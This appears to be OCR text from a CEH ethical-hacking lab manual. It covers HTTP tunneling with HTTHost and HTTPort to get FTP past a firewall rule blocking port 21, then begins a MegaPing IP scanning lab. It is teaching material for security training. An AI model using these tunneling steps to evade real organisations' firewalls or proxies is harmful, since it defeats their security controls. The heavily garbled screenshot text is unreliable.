| £ I S f n » M (lo ca l)ServwjClomJ) World VVxicWeb PwbW-mg S tm i ‫־‬ 1CwJOCor IS!aw j (^<r1tu4 Ptcr>*0M‫...זו‬ ‫י‬2‫צ‬ ne servce 1!<” ‫׳‬v r!ttt’.ct ^ vau''* S‫*״‬to/. Cooy C^iVeo Mir^wwnt Se‫<׳־‬ce MWU0K*... TUtWtbM.. £fetYrd»/.e Audo Mo'eOcSa... C«so1aion: (V»1‫׳‬df1Web an‫־‬w r<rr end ari'iprsron rry.y■fc:‫־‬r r InfonrnstonSerMoesHjrage- ^ 1'‫<־׳‬to/.s AuctoErekJrtitSJan ^ 1Y‫<־־‬to/.SCotorSySteri Ha'sOeid... ‫־‬he WaPl.. £(Mfld0M DectoymeotSevcesSesa Ha'cOes r... £5.%Yf‫־‬tto/.9DriverFourdsoon -Lee ‫״‬cce Drver“ ‫־‬ *‫׳‬ xr■ Ma-aoe; u... «Y‫־־‬d3‫./׳‬s & ‫׳‬0‫׳‬ Repo8‫יט‬‫׳‬ Ser1ce flj%Yrd»/.9E‫׳‬e 1t Cotecto %V'tkr/.$®‫׳‬ei: uw ^>Yrd0/,s F»e.dl Ab1‫־‬.-sero... Thssevfc... Thssevfc... ViWowsF.. Sated Stated . Stated (^»Y‫־׳‬d0/.9tnsteller I a a t Adds, mod■.‫״‬ CJt«Yrtto/.9»^1‫?׳‬gen‫־‬e1t 1 «‫י׳«יו״‬5‫י׳ז‬ ‫קמי׳‬ ftovd» a ... Stated «v‫־׳‬d0/,9ModiiesInjuler &»ab«ns... Stated Ci«Y‫׳‬xto/.®Biocen ActivationSetv'd I ^ r ‫•יזל‬ wndo... Stated C( •Y'-do’/.* 5«mote M Re*»t VJ«o‫״‬ »B... Stated £^.'‫־׳‬rt>/.« try AlTMka * Mints‫*׳‬ S... stand ^ iV'tte/.fl updat# ‫...־י‬ statid ^*vrHnp webpw v Auto-ceeovJ ^ .v ‫<»׳‬-Autocar*c Perfcrwsrce Aflao*f KrHTTPl... H nyrB fi Pre0 6*0^‫־‬.. •'08>'‫׳‬t3ecr bet) Stared J E 3 S J B £ x a r d e ; A / £‫:־‬c -T ‫;'׳‬g .‫־‬',o'c '■,.e: -vt»e-‫־‬n ; sr.-g .:•r: co‫־־‬tx :r & It bypasses HTTPS and HTTP proxies, transparent accelerators, and firewalls. It has a built-in SOCKS4 server. FIGURE 142: Stopping World Wide Web Services in Windows Server 2008 Open Mapped Network Drive “CEH-Tools" Z:CEHv8 Module 03 Scanning NetworksTunneling ToolsHTTHost Open HTTHost folder and double click htthost.exe. Tlie HTTHost wizard will open; select die Options tab. On die Options tab, set all die settings to default except Personal Password field, which should be filled in widi any other password. 111diis lab, die personal password is kmagic.'? ‫ט‬ It supports 4. strong traffic encryption, which 5. m akes proxy logging useless, 6. and supports 7. NTLM and other authentication schem es. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 223
Module 03 - Scanning Networks 8. Check die Revalidate DNS nam es and Log Connections options and click Apply HTTHost 1.8.5 N etw ork Bind e x te rn a l to : 10.0.0.0 Port: [80 P e rs o n a l p assw ord: Bind lis te n in g to : |0 .0.0.0 A llow access fro m : 10.0.0.0 [‫־‬ P a s s th ro u g h u n re c o g n iz e d re q u e s ts to : H o s t n a m e o r IP : P o rt: O rig in a l IP h e a d e r fie ld : | x ‫־‬O rig in a l‫־‬ IP|8 1 T im e o u ts : 1 1 2 7 .0 .0 .1 M a x . local b u ffe r: 2‫־‬1=0|3‫־‬ A pply R e v a lid a te DNS n a m e s Log co n n ectio n s‫־‬ S tatis tics ] A p p licatio n log |^ 3p tio n s jj" S e c u r'ty | S e n d a G ift) FIGURE 14.3: HTTHost Options tab 9. Now leave HTTHost intact, and don’t turn off Windows Server 2008 Virtual Machine. 10. Now switch to Windows Server 2012 Host Machine, and install HTTPort fiom D:CEH-ToolsCEHv8 Module 03 Scanning NetworksTunneling ToolsHTTPort and double-click httport3snfm.exe 11. Follow die wizard-driven installation steps. 12. Launch the Start menu by hovering die mouse cursor in the lower-left corner of the desktop. FIGURE 14.4: Windows Server 2012 - Desktop view 13. Click die HTTPort 3.SNFM app to open die HTTPort 3.SNFM window. & To set up HTTPort need to point your browser to 127.0.0.1 & HTTPort goes with the predefined mapping "External HTTP proxy‫״‬ of local port Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 224
Module 03 - Scanning Networks 5 t 3 f t Administrator Server Manager Windows PowerShell G oogle Chrome Hyper-V Manager HTTPort 3.SNPM i. m » 91 1 Con>puter *‫נ‬ Control Panel V Hyper-V Virtual Machine... SOI 5f‫׳‬ w r in c a k n o r Ccntof.~ n £ Command Prompt M021IU Firefox Nctwodc ‫״‬ ‫״‬ ■ ‫י‬ ‫י‬ -“■ ‫־‬‫־‬‫־‬F © if Proxy W orkbea. M egaPng - T *8 Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks FIGURE 14.5: Windows Server 2012 - Apps 14. The HTTPort 3.SNFM window appears as shown in die figure diat follows. For each software to create custom, given all the addresses from which it operates. For applications that are dynamically changing the ports there Socks4-proxy mode, in which the software will create a local server Socks (127.0.0.1) '‫־‬r°HTTPort 3.SNFM S ystem j Proxy :j por^ m apping | A bout | R egister | HTTP proxy to bypass (b la n k = direct or firew all) Host n a m e or IP address: Port: Proxy requires authentication U s ern am e: Password! Bypass m ode: Misc. options U ser-A gent: IE 6 .0 Use personal re m o te host a t (b la n k = use public) Host n a m e or IP address: Port: Password: I-------------------------------- P I-------------- Start? 4— This button helps FIGURE 14.6: HTTPort Main Window 15. Select die Proxy tab and enter die host name or IP address of targeted machine. 16. Here as an example: enter Windows Server 2008 virtual machine IP address, and enter Port number 80 17. You cannot set die Username and Password fields. 18. 111die User personal remote host at section, click start and dien stop and dien enter die targeted Host machine IP address and port, which should be 80. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 225
Module 03 - Scanning Networks 19. Here any password could be used. Here as an example: Enter die password as ‘*magic‫״‬ In real world environment, people som etim es use password protected proxy to make company em ployees to a c c e ss the Internet. 20. Select die Port Mapping tab and click Add to create New Mapping Q HTTHost supports the registration, but it is free and password-free - you will be issued a unique ID, which you can contact the support team and ask your questions. 21. Select New Mapping Node, and right-click New Mapping, and click Edit 1 - 1 °HTTPort 3.SNFM*‫ב‬ A bout | R egister JPort m appingSystem | Proxy Static T C P /IP port m appings (tu n n els) 1‫םייים‬1 LEDs: ‫ם‬ □ □ □ O Proxy Q New m apping Q Local port 1-0 (3 R e m o te host — re m o te , host, n a m e □ R e m o te port 1_0 Select a m apping to se e statistics: No stats - select a m apping n /a x n /a B/sec n /a K Built-in SOCKS4 server W Run SOCKS server (p o rt 1 0 8 0 ) A vailable in "R em o te Host" m o d e : r Full SOCKS4 support (B IN D ) ? | 4— This button helps FIGURE 14.8: HTTPort creating a New Mapping r|a HTTPort3.SNFM | 3 ' ‫־‬ x S ystem Proxy | p0 rt m ap p in g | About | R egister | HTTP proxy to bypass (b la n k = direct or firew all) Host n a m e or IP address: Port: | 1 0 .0 .0 .4 |80 Proxy requires authen tication U s ern am e: Password: Misc. options U ser-A g en t: Bypass m o d e : | IE 6 .0 | R e m o te host Use personal rem o te host a t (b la n k * use public) Host n a m e or IP address: *o rt: P assv»rd: |1 0 .0 .0 .4 I80 |............ 1 ? | <— This button helps Start FIGURE 14.7: HTTPort Proxv settings rindow Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 226
Module 03 - Scanning Networks T3 3HTTPort 3.SNFM System | Proxy Port m apping | A bout | R egister | Static T C P /IP port m ap p in g s (tu n n els) Add R em o ve New m ao □ Local p 0 ■ Edit ‫ש‬ LEDs: □ □ □ □ O Proxy 0 R e m o te host re m o te , host, n a m e (=J R e m o te port L_o Select a m apping to se e statistics: No stats - select a m apping n /a x n /a B/sec n /a K Built-in SOCKS4 server W Run SOCKS server (p o rt 1 0 8 0 ) A vailable in "R em o te Host" m o d e: r Full SOCKS4 support (B IN D ) ? | 4 — This button helps FIGURE 14.9: HTTPort Editing to assign a mapping 22. Rename this to ftp certified hacker, and select Local port node; then light- click Edit and enter Port value to 21 23. Now right click on Remote host node to Edit and rename it as ftp.certifiedhacker.com 24. Now right click on Remote port node to Edit and enter die port value to 21 r * I HTTPort 3.SNFM - 1 ° r x • 1 S ystem | Proxy Port m apping | A bout | R egister | r Static T C P /IP port m appings (tu n n els) •.•‫.=•׳‬-1=1 / s Add 0 ‫־‬ Local port 5 -2 1 R em o ve 0 R e m o te host ftp.certifiedhacker.co m E5 R e m o te port = I— 21 V Select a m apping to see statistics: LEDs: No stats ‫־‬ inactive ‫ם‬ □ □ □ n /a x n /a B/sec n /a K O Proxy 1d u l i t ‫־‬ in s e r v e r W Run SOCKS server (p o rt 1 0 8 0 ) A vailable in "R em o te Host" m o d e: I” Full SOCKS4 support (B IN D ) | ? | This button helps FIGURE 14.10: HITPort StaticTCP/IP port mapping 25. Click Start on die Proxy tab of HTTPort to run die HTTP tunneling. Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks S In this kind of environment, the federated search webpart of Microsoft Search Server 2008 will not work out-of- the-box because w e only support non-password protected proxy. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 227
Module 03 - Scanning Networks ‫־‬r a :HTTPort 3.SNFM System ^ o xy | Port m ap p in g | About | R egister | - HTTP proxy to bypass (b la n k = direct or firew all) Host n a m e or IP address: Port: |1 0 .0 .0 .4 [80 Proxy requires authen tication U s ern am e: Password: Bypass m o d e: ‫ד‬ ‫נ‬ [R e m o te host Misc. options U ser-A gent: IE 6 .0 Use personal re m o te host a t (b la n k = use public) Host n a m e or IP address: Port: Password: |10.0.0.4 [So ‫*ן‬**‫*״‬ ? | ^— This button helps FIGURE 14.11: HTTPort to start tunneling 26. Now switch to die Windows Server 2008 virtual machine and click die Applications log tab. 27. Check die last line if Listener listening at 0.0.0.0:80, and then it is running properly. (J3 HTTP is the basis for Web surfing, so if you can freely surf the Web from where you axe, HTTPort will bring you tlie rest of the Internet applications. HTTHost 1.8.5 Application log: MAIN: HTTHOST 1.8.5 PERSONAL GIFTWARE DEMO starting^ MAIN: Project codename: 99 red balloons MAIN: Written by Dmitry Dvoinikov MAIN: (c) 1999-2004, Dmitry Dvoinikov MAIN: 64 total available connection(s) MAIN: netv/ork started MAIN: RSA keys initialized MAIN: loading security filters... MAIN: loaded filter "grant.dll" (allows all MAIN: loaded filter "block.dll" (denies al MAIN: done, total 2 filter(s) loaded MAIN: using transfer encoding: PrimeScrambler64/SevenTe grant.dll: filters conections block.dll: filters conections !LISTENER: listening at C.C .0 .C:sT| connections within I connections withir z ] Options Security | Send a Gift( A p p lica tio n logStatistics Q To make a data tunnel through the password protected proxy, so we can map external website to local port, and federate tlie search result. FIGURE 14.12 HTTHost Application log section 28. Now7switch to die Windows Server 2012 host machine and turn ON die Windows Firewall 29. Go to Windows Firewall with Advanced Security Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 228
Module 03 - Scanning Networks 30. Select Outbound rules from die left pane of die window, and dien click New Rule in die right pane of die window. ‫־‬-■ - : ° ‫־‬Windows Firewall v/ith Advanced Security F ie Action View Help Outbound Rule* New Rule... V Filter by Profile V Filter by State 7 Filter by Group View O Refresh Export List... Q Help O utbound R u in Nam e Group Profile Inabied A © B ‫׳‬ anchCa(heC0nt«n:Rat1i«val (HTTP-0... BranchCache- Content Retc... A l No © B rsn ch C ech e H orfed Ca<t!e Cbent IHTT... BranchCache - Hosted Cech - A l No © B ra n c h C e ih e K n W J C •ch • S*rvw(HTTP. BranchCache - Hotted C a d i. A l No © B ra n ch C ache Peer Dncovery (W SD Out) B ran ch (arhr - PeerOtseove... A l No © C o ‫׳‬« Networking • D N S <U0P-0ut) Core Networking A l Yes ■ © C o r e Netw orking- D>1v> m -eH o*Config... Core Networking A l Yes © C o r e Networking ‫־‬ Dynam ic H ost Config... Core Networking A l Yes © C o r e N e tw o r k n g ‫־‬ Grcup Policy (ISA5S‫־‬~ Core Networking Deane■! Ves © C o r e Networking - 5 ‫׳‬cup P o k y (NP-Out) Core Networking Domain Yes © C oreN etw ork w ig - Group Policy CTCP-0-. Core Networking Deane•! Yes © C o r e N etworking - Internet Group Mana... Core Networking A l Yes © C o r e N etworlnng - IPHTTPS CTCP-Out] Core Networking A l Yes © C o r e N etworking - IPv6 (IP v 6 0 ‫־‬ut) Core Networking A l Ves © C o r e NetworVwg ‫־‬ M ulbeost listener Do-. Core Networking A l Ves © C o r e Networking - M ulocast Listener Q u~ Core Networking A l Yes © C o r e Network*!g - M ulticast I!stener Rep~ Core Networking A l Ves © C o r e Networking • M utecjst Listener Rep... Core Networking A l res © C o r e N etworking - N eighbor Dnc every A... Core Networking A l Ves © C o r e Networking N eighbor D iscoveryS.- Core Networking A l Yes © C o r e N rtw o fk n g ‫־‬ Packet 1c o Big (ICMP-. Core Networking A l V o © C o r e Networking Parameter Problem (I- Core Networking A l Ves © C o r e N etworking - P.cutei A dvertnem ent... Care Networking A l Vet © C o r e Networking - P.cuur S o ic ta e o n (1C.. Core Networking A l Yes (red o (UOP-Out!*‫־‬* ^Core Network© Core Networking A l Vet v ' "■i T r " ........... ‫ז‬- W indows F1rew,5ll w ith Adv! Q Inbound R u in ■ O utbound Rules | Connection Security Ru ‫•ן‬ ^ M onitoring FIGURE 14.13: W1ndcra*sFirewallwith Advanced Secuntywindow in Window's Server 2008 31. 111die New Outbound Rule Wizard, select die Port option in die Rule Type section and click Next p N e w O u tb o u n d Rule W izard ■ R u le Type Select the type cf firewall ruleto create Steps. * Rule Type What :ype of rue wodd you liketo create? 4 Protocol and Ports « Action O Program « Profle Rde Bidt controls connectionsfor a program. « flame ‫>§י‬ Port | RJe twl controls connexionsfor a TCP or UDP W . O Predefined: |BranrhCacne -Content Retrieval (Ueee HTTP) v 1 RJe t a controls connectionsfor a Windows experience. O Custom Cu3tomrJe <Beck Next > 11 Cancel FIGURE 14.14: Windows Firewall selecting a Rule Type £ ‫ז‬ Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks S Tools demonstrated in this lab are available in Z: Mapped Network Drive in Virtual Machines Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 229
32. Now select All remote ports in die Protocol and Ports section, and click Next Module 03 - Scanning Networks New Outbound Rule Wizard Protocol and Porta Specify the protocols and ports to which ths rJe apofes Doest‫*־‬srule aoptyto TCP or UDP? <!•> TCP O UDP Does tnis n ie aoply tc all remote ports or specific renote port*9 ! ? m o t e p o d s O Specificremoteports: Example 80.443.5000-5010 CancelNed ><Eacx Steps + R u• 'yp • 4 Prctocol and Ports 4 Acaor 4 Profile 4 Name Q HTTPort doesn't really care for the proxy as such, it works perfectly with firewalls, transparent accelerators, NATs and basically anything that lets HTTP protocol through. FIGURE 14.15: Windows Firewall assigning Protocols and Ports 33. 111 die Action section, select die Block the connection'’ option and click Next New Outbound Rule Wizard A c tio n Spccify the acton to be taken when ‫ס‬ conncction •naccheathe condticna specified in the n ie . Steps 4 H U e Type W h a t acbo n o h o J d b« ta k e n w h o n a c o n n e x io n m atch 08tho o p oc/iod con citicn Q 7 4 P roto co l a n d Porta O Alowttvconnection T Tw n c lx J e s c o rn c c tio n a that a ie pio tecto d w th IP ao c 09 w e l c s t‫־‬w 3 e ate not. O Alow Itic cw iicdiui If MIs secuie Ths ncbdes only conrections thar. have been a1ihent1:ated by usng IPsec. Connections wil be secued using the settngs in IPsec p‫־‬op5rtes and nJes n the Conrecion Security RuteTode. 4 A c io n 4 Profile 4 Nam e Q You need to install htthost on a PC, who is generally accessible on the Internet - typically your "home" PC. This means that if you started a Webserver on the home PC, everyone else must be able to connect to it. There are two showstoppers for htthost on home PCs '• ) H o c k t h e c o n n e c t io n Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 230
Module 03 - Scanning Networks FIGURE 14.16: Windows Firewall setting an Action 34. 111 die Profile section, select all three options. The rule will apply to: Domain, Public. Private and then click Next *New Outbound Rule Wizard Profile Specify the proflesfor which this rule applies Whendoes#‫מו‬ruleapply’ 171 D am an Vpfces *I en a computer is connected to Is corporate doman. 0 P r iv a te 3ppies wt en a computer is connected to a pivate oetwak bcabcn. such as a home 3rwor<pi ce B Public Vp*‫״‬c3 cn a ccmputcr io ccon cctcd to a p jb lc nctwoiK kcooon CancelNext >c Eacx Skin * Ru*Typ# 43rctocol anc Ports # *cbor 3rcfile Q NAT/firewall issues: You need to enable an incoming port. For HTThost it will typically be 80(http) or 443(https), but any port can be used - IF the HTTP proxy at work supports it ‫־‬ som e proxys are configured to allow only 80 and 443. FIGURE 14.17: Windows Firewall Profile settings 35. Type Port 21 Blocked in die Name field, and click Finish New Outbound Rule Wizard N a m e Specify the name and desorption of this li e . N o n e |?or. 2' BbdceJ Desaiption (optional): CancelFinish<Back ZZy Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks £ 3 The default TCP port for FTP connection is port 21. Sometimes the local Internet Service Provider blocks this port and this will result in FTP Ethical H acking and Counterm easures Copyright C by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C®W<EAfl*1MaW&al Page 231
Module 03 - Scanning Networks FIGURE 14.18: Windows Firewall assigning a name to Port 36. The new rule Port 21 Blocked is created as shown in die following figure. 1-1 “1 * :Windows Firewall with Advanced Security F ie Action View H d p A» tio ro Outbound Rules New Rule... V Filter by Profit• V Fliter byState V Filter by Gioup View Q Refresh [a» Export List... L i Help Port 21 Blocked * Disable Rule 4 cut Gfe Copy X ‫ם‬»‫»ו‬‫♦ז‬ ( £ | Propeitie* U Help A l :1 A l A l A l A l A l D om ain D om ain Dom ain A l A l A l A l A l A l A l A l A l A l A l A l A l BranchCache • Content Retr.. B i.n c h ( m h r • H otted Cach BranchCache • H otted Cach BranchCache • Peer Discove.. Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking C ote Networking Cote Networking Core Networking Core Networking Core Networking Cor• Networking Core Networking Core Networking CortNttwQiking Core Networking Core Networking Core Networking Na [O^Port 21 Blockcd © B ran ch C ach e Content R c trc v tl (H T T P -0 .. © B ra nch(*! h e H o tte d C ache Client (H IT . © BtanchCache Hosted Cache $erv*1(HTTP... © B ran ch C ach e Peer Oiseevery //SD Cut) © C o r e Netw orking ‫־‬ ONS(UOP-OutJ © C o ie N etw orkin g- Dynam ic H o d Config.. © C o r e Netw orking - Dynam ic H ost Config... © C o r e Netw orking - Group Pcfccy CLSASS-- @ PCore Netw orking - Group PcEcy (fJP-Out) © C o r e Netw orking - Group P o ic y (TCP-O -. © C o r e Netw orking - internet Group Mana... © C o r e N etw orkin g- lPHTTP5(TCP-O utJ © C o t e Netw orking - Pv6 (Pw6-0ut) © C o r e Netw orking V u h cast Listener Do‫״‬ © C o r e Netw orking M u h <yt* listener O j ‫״‬ . © C o ie Kielw ort m g • M u l1<«U Iktenet Rep. © C o r« Netw orking • V u h cast -Ktener Rep. © C o r e Netw orking rfcignfccf Discovery A... © C o r .1Netw orkm g • Neighbor Discovery 5 , ©Coie Networking - F«.h&Tv. Big KM P.. © C o r e Netw orking - Parameter Problem (I.. © C o r e Netw orking ‫־‬ Router Ad.ertcem ent... © C o r e Netw orking - Router SoKckation (1C... W indows Firewall w ith Adv; C nfcound Rules C O utbound Rules Connecbon Security Rul t M onitoring FIGURE 14.19: Windows Firewall New rule 37. Right-click die newly created rule and select Properties Windows Firewall with Advanced Security* File A ction View H d p * ‫►י‬ ^ q ! I Actions Outbound Rules - New Rule... V Filter by Profile ► V Filter by State ► V Fliter by Group ► View Refresh ^ Export List... Q Help ► Port 21 Blocked - ♦ Disable Rule 4 c ‫״‬ t •41 Copy X Delete Properties 0 Help Group * Profie Enal Disable Rule Branc hCac he ‫־‬ Cor BranchCache - Hos Cut BranchCache ‫־‬ Ho: C op y BranchCache - Pee Core Netw orking Lore Networking Delete Properties H d pCore Netw orking Core Netw orking D om *n Vet Core Networking Do»n*n Ves Core Networking Domain Ye* Core Netw orking A l Vet Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yes Core Networking A l Yb Core Netw orking A l Yes Core Networking A l YCS Core Netw orking r . . . *■------- 11— A l Yes Nam e O .P0 rt2 1 Blockcd ^ B ra n c h C a c h e Content Retrieval (HTTP-O‫״‬ . © B ran ch C ach e H osted C ache C iem (H T T ‫״‬ . © B ran ch C ach e H osted C ache Saver(HTTP_ © B ran ch C ach e Peet D isccvay (WSO‫־‬OulJ © C o i e Networking - D f5 (U 0P -0u t) © C o r e Networking D >nanvc H c itC c n fig .. © C o r e N etw orbng • D>nrn» Most Config... © C o r e N etw orbng • Group Policy (ISASS-... © C o r e Networking Group Policy (NP-Out) © C o r e Networking Group Policy (TCP0 ‫-־‬ © C o r e N etw orbng • Intern*! G ioup Mana.. © C o r e Networking IPHTTPSfTCP-Out) © C o r e N etw orbng - IPv6 (1P»‫<־$׳‬XjtJ © C o r e N etw orbng - M ufticest Listener Do... © C o r e N etw orbng - M J c c a st Listener Qu... © C o r e N e r w c r b n g - M J b c sst Listener Rep... © C o r e N etw orbng - M ulbcesi Listener Rep... © C o r e N etw orbng - N eighbor D iscovery A‫.״‬ © C o r e N etw orbng N eighbor D iscovery S... l© C cr e N etw orbng ■ Packet Too Big (ICMP... © C o r e N etw orbng • Paiam eter Problem (1-‫״‬ © C o r e N etw orbng Reuter A dvcnscm cn t... © C o r e N etw orbng * R culet Solicitation (IC~ g f W indows Firewall w ith Adv; C l inbound Rules O O utbound Rulea Connection Security Rul X/ M onitoring 1 the properties dialog box for the current seleajon FIGURE 14.20: Windows Firewall new rule properties 38. Select die Protocols and Ports tab. Change die Remote Port option to Specific Ports and enter die Port number as 21 39. Leave die other settings as dieir defaults and click Apply dien click OK. ^ HTTPort doesn't really care for the proxy as such: it works perfectly with firewalls, transparent accelerators, NATs and basically anything that lets the HTTP protocol through. S HTTPort then intercepts that connection and runs it through a tunnel through the proxy. £ 7 Enables you to bypass your HTTP proxy in case it blocks you from the Internet Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 232
Module 03 - Scanning Networks i— ‘With HTTPort, you can use various Internet software from behind the proxy, e.g., e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC etc. The basic idea is that you set up your Internet software 40. Type ftp ftp.certifiedhacker.com in the command prompt and press Enter. The connection is blocked in Windows Server 2008 by firewall ‫ד‬*Port 21 Blocked Properties jerteral_________Pngams and Services Remote Conpjtefs Protocolt and Fore | Scope | Advancec j Local Princpab All Potto Exampb. 80. 443.5003-5010 FVwocob and po*s Prctocdtype: Prctocd ru nber Loco port Specifc PatsRemote p3rt: [21 Example. 80. 443.5003-5010 I Custonizo.hten‫־‬et Gortnd Message Protocol (C M P)« ting*: FIGURE 14.21: Firewall Port 21 Blocked Properties £3 HTTPort does neither freeze nor hang. What you are experiencing is known as ‫״‬blocking operations” FIGURE 14.22: ftp connection is blocked 41. Now open die command prompt 011 die Windows Server 2012 host machine and type ftp 127.0.0.1 and press Enter 7 ^ HTTPort makes it possible to open a client side of a T CP/IP connection and provide it to any software. The keywords here are: "client" and "any software". C E H Lab M anual Page 233 Ethical H acking and Counterm easures Copyright © by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited
Module 03 - Scanning Networks FIGURE 14.23: Executing ftp command Lab Analysis Document all die IP addresses, open ports and running applications, and protocols you discovered during die lab. Tool/Utility Information Collected/Objectives Achieved H T T Port Proxy server Used: 10.0.0.4 Port scanned: 80 Result: ftp 127.0.0.1 connected to 127.0.0.1 P L E A SE TALK TO YOUR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D TO T H I S LAB. Questions 1. How do you set up an HTTPort to use an email client (Oudook, Messenger, etc.)? 2. Examine if software does not allow editing die address to connect to. Internet Connection Required es0 Y Platform Supported 0 Classroom □ No □ iLabs C E H Lab M anual Page 234 Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Module 03 - Scanning Networks Basic Network Troubleshooting Using MegaPing MegaPingis an ultimate toolkitthatprovides completeessentialutilitiesfor information systemadministrator andIT solutionproviders. icon key Lab Scenario You have learned in the previous lab that HTTP tunneling is a technique where communications within network protocols are captured using the HTTP protocol. For any companies to exist 011 the Internet, they require a web server. These web servers prove to be a high data value target for attackers. Tlie attacker usually exploits die WWW server running IIS and gains command line access to the system. Once a connection has been established, the attacker uploads a precompiled version o f the HTTP tunnel server (lits). With the lits server set up the attacker then starts a client 011 his 01‫־‬her system and directs its traffic to the SRC port of the system running the lits server. This lits process listens 011 port 80 of the host WWW and redirects traffic. Tlie lits process captures the traffic in HTTP headers and forwards it to the WWW server port 80, after which the attacker tries to log in to the system; once access is gained he or she sets up additional tools to further exploit the network. MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports. 111 diis lab you will learn to use MegaPing to check for vulnerabilities and troubleshoot issues. Lab Objectives This lab gives an insight into pinging to a destination address list. It teaches how to: ■ Ping a destination address list ■ Traceroute ■ Perform NetBIOS scanning / / Valuable information s Test your knowledge Web exercise m Workbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 235
Module 03 - Scanning Networks Lab Environment To cany out die lab, you need: ■ MegaPing is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksScanning ToolsM egaPing ■ You can also download the latest version of Megaping from the link http: / / www.magnetosoft.com/ ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ Administrative privileges to run tools ■ TCP/IP settings correcdy configured and an accessible DNS server ■ This lab will work in the CEH lab environment, on W indows Server 2012, W indows 2008, and W indows 7 Lab Duration Time: 10 Minutes CD Tools demonstrated in this lab are available in D:CEH• ToolsCEHv8 Module 03 Scanning Networks PIN G stands for Packet Internet Groper. Overview of Ping Tlie ping command sends Internet Control M essage Protocol (ICMP) echo request packets to die target host and waits for an ICMP response. During diis request- response process, ping measures die time from transmission to reception, known as die round-trip time, and records any loss packets. Lab Tasks 1. Launch the Start menu by hovering die mouse cursor on the lower-left corner of the desktop. T A S K 1 IP Scanning FIGURE 13.1: Windows Server 2012 - Desktop view 2. Click die MegaPing app to open die MegaPing window. Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 236
Module 03 - Scanning Networks FIGURE 15.2: Windows Server 2012 - Apps TQi^MegaPing ma!1^ n n d o w ^ ^ h o ^ M 1^ h ^ b llo n n ^ 1‫־‬gu1^ ^ ^ 55 MegaPing (Unregistered) - □ ' x ‫ד‬ 3. File V ie w T o o ls H d p ‫&י־‬ D N S L id rto sfe * D N S L o o k u p N a m e Q F n g c r 1S N e tw o rk T im e g g P in g g g T raceroute Who 11 ^ N e tw o rk R# toufc# t <<•> P ro c e ss Info S ystam Info £ IP S can n er $ N etBIO S S can n er •'4? Share S can n er ^ S e cu rity S can n er - J ? P o rt S can n er J i t H o s t M o n ito r *S L b t H o>ts Figure15.3: MegaPing main windows 4. Select any one of die options from the left pane of the window. 5. Select IP scanner, and type in the IP range in die From and To field; in this lab the IP range is from 10.0.0.1 to 10.0.0.254. Click Start 6. You can select the IP range depending on your network. CQ All Scanners can scan individual computers, any range of IP addresses, domains, and selected type of computers inside domains Security scanner provides the following information: NetBIOS names, Configuration info, open TCP and UDP ports, Transports, Shares, Users, Groups, Services, Drivers, Local Dhves, Sessions, Remote Time of Date, Printers Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 237
Module 03 - Scanning Networks ‫־‬°rMegaPing (Unregistered)fs r File V « ‫*׳‬/ T o o k H elp f t f t ^ * %v ^ a* 3 < DNS L st H osts r ^ — _ r « a P -1'SW W IP Scanner S s t n g jt I3Scanner Select ira c c ro u tc W h o K I “ I | 10 0 0 1 10 0 0 254 | 1 S M 1 N e tw o rk R esou rces ► S c a m •‫׳׳‬ .3‫׳‬ * t D N S L o o k u p N a m e § Fin ger N e tw o rk T im e 8 a8 P in g <§> Process In fo ^ S ystem Info ■*iiaui.111 ■ £ N etBIO S S canner Y * Share S can n er j& S ecurity Scanner ^ P o rt S can n er ^ H o s t M o n ito r FIGURE 15.4: MegaPing IP Scanning It will list down all the IP ad dresses under that range with their TTL (Time to Live), Status (dead or alive), and die sta tistics of the dead and alive hosts. MegaPing (Unregistered) IP 5 i« n n w $ IP Scanner S atn g eX IP S a n n a r Setect- |R arge 10 . 0 0 . 1 10 0 0 251 I Start F S c a r e Status: Zoroetec 25^ adcresees in 15 8ccs Show MAC Addresses Hosts Stats T old . 254 Active 4 Paled: 250 Report *ddrest Name True T T L Statj* .= 1 10.0.0.1 0 &4 A fiv e g 1 a 0 .0 4 1 128 Abve g 10.0.0.6 0 128 A S ve £ 1ao.o.7 0 128 Afcve g 1a0.0.10 O a t . . JQ 10.0.0.100 D e s t.. g 1010.0.101 D e st._ 1a0.0.102 D est — 